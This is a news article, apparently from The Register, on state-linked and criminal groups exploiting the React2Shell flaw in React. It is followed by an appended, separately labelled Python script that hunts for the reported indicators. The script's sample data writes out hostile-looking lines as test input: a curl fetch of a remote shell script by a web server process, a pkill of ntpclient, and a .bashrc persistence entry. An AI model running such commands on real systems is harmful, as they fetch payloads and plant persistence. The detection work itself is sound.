China, Iran are having a field day with React2Shell, Google warns

Who hasn't exploited this max-severity flaw?

The Register

At least five more Chinese spy crews, Iran-linked goons, and financially motivated criminals are now attacking React2Shell, a maximum-severity flaw in the widely used React JavaScript library, according to Google.

Unauthenticated attackers can abuse the flaw, tracked as CVE-2025-55182, to remotely execute code, and the Chocolate Factory's threat hunters said multiple groups are using this vulnerability to deploy backdoors, tunnelers, and cryptocurrency miners.

React maintainers disclosed the critical bug on December 3, and exploitation began almost immediately. According to Amazon's threat intel team, Chinese government crews, including Earth Lamia and Jackpot Panda, started battering the security hole within hours of its disclosure. Palo Alto Networks' Unit 42 responders have put the victim count at more than 50 organizations across multiple sectors, with attackers from North Korea also abusing the flaw.

Google, in a late Friday report, said at least five other suspected PRC spy groups also exploited React2Shell, along with criminals who deployed XMRig for illicit cryptocurrency mining, and "Iran-nexus actors," although the report doesn't provide any additional details about who the Iran-linked groups are and what they are doing after exploitation.

"GTIG has also observed numerous discussions regarding CVE-2025-55182 in underground forums, including threads in which threat actors have shared links to scanning tools, proof-of-concept (PoC) code, and their experiences using these tools," the researchers wrote.

The Beijing-backed suspected spy crews include UNC6600, which exploits the vulnerability to deliver the Minocat tunneler and establish persistence on infected systems, and UNC6586, which deploys the Snowlight backdoor. In the case of UNC6586, Google's threat intel group spotted Snowlight making HTTP GET requests to command-and-control infrastructure to retrieve additional payloads masquerading as legitimate files.

Additionally, another Chinese espionage group Google tracks as UNC6588 exploited CVE-2025-55182 and then downloaded a Compood backdoor, while UNC6603 used the vuln to deploy an updated Hisonic backdoor. "Telemetry indicates this actor is targeting cloud infrastructure, specifically AWS and Alibaba Cloud instances, within the Asia Pacific (APAC) region," Google Threat Intelligence said.

Finally, China-nexus group UNC6595 is abusing the flaw to deploy Angryrebel.Linux, primarily targeting infrastructure hosted on international Virtual Private Servers (VPS).

In addition to the first React bug, CVE-2025-55182, three additional vulnerabilities were disclosed last week: CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779. These allow attackers to force denial-of-service conditions and potentially leak Server Function source code.

To avoid worst-case scenarios from any of these four vulnerabilities, patch vulnerable React Server Components and monitor network traffic with an eye out for outbound connections to the indicators of compromise (IOCs) listed in Google's report, especially wget or cURL commands initiated by web server processes.

The Google threat intel team also recommends hunting for newly created hidden directories like $HOME/.systemd-utils, the unauthorized termination of processes including ntpclient, and the injection of malicious execution logic into shell configuration files like $HOME/.bashrc. ®
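As an added example (not code from Google's report or from The Register), the following Python script applies the indicators above to constructed telemetry: wget/cURL launched by web server processes, kill commands aimed at ntpclient, the $HOME/.systemd-utils directory, and execution lines added to $HOME/.bashrc. The web server process names, the event record shape and all sample values are assumptions.

```python
import re
from collections import namedtuple
# Assumed names of web server processes on the host being hunted (not from the report).
WEB_SERVER_PROCS = {"node", "next-server", "nginx", "apache2", "httpd"}
DOWNLOADERS = {"wget", "curl"}
KILL_TOOLS = {"kill", "pkill", "killall"}
HIDDEN_DIR_IOC = ".systemd-utils"  # hidden directory named in Google's report
DOWNLOAD_RE = re.compile(r"(?:^|[\s;&|(/])(wget|curl)\b")
# One process-execution record; a constructed shape, not any real EDR schema.
ExecEvent = namedtuple("ExecEvent", "pid parent_name name argv")

def download_by_webserver(events):
    """wget/curl whose parent is a web server process: the outbound-fetch pattern."""
    return [e for e in events if e.parent_name in WEB_SERVER_PROCS and e.name in DOWNLOADERS]

def ntpclient_kills(events):
    """Kill commands aimed at ntpclient (the 'unauthorized termination' indicator)."""
    return [e for e in events if e.name in KILL_TOOLS and any("ntpclient" in a for a in e.argv[1:])]

def hidden_dir_hits(home_entries):
    """Entries directly under $HOME matching the hidden-directory indicator."""
    return sorted(d for d in home_entries if d == HIDDEN_DIR_IOC)

def rc_injection_hits(rc_text):
    """Non-comment rc lines that fetch a payload or run something from the hidden directory."""
    hits = []
    for line in rc_text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and (DOWNLOAD_RE.search(s) or f"/{HIDDEN_DIR_IOC}/" in s):
            hits.append(s)
    return hits

def hunt(events, home_entries, rc_text):
    """Run every check and return the findings keyed by indicator."""
    return {
        "webserver_download": download_by_webserver(events),
        "ntpclient_kill": ntpclient_kills(events),
        "hidden_dir": hidden_dir_hits(home_entries),
        "rc_injection": rc_injection_hits(rc_text),
    }

# Constructed sample telemetry; 198.51.100.7 is an RFC 5737 documentation address.
SAMPLE_EVENTS = [
    ExecEvent(4101, "node", "curl", ["curl", "-fsSL", "http://198.51.100.7/x.sh"]),
    ExecEvent(4102, "bash", "curl", ["curl", "https://example.org/"]),
    ExecEvent(4103, "sh", "pkill", ["pkill", "ntpclient"]),
    ExecEvent(4104, "node", "ls", ["ls", "-la"]),
]
SAMPLE_HOME = [".bashrc", ".cache", ".systemd-utils", "projects"]
SAMPLE_BASHRC = "# ~/.bashrc\nexport PATH=$PATH:$HOME/bin\nnohup $HOME/.systemd-utils/svc >/dev/null 2>&1 &\n"
```

Feed it real process-creation events, the listing of each service account's home directory and the contents of its shell rc files; a hit in any category is a lead to triage, not a verdict.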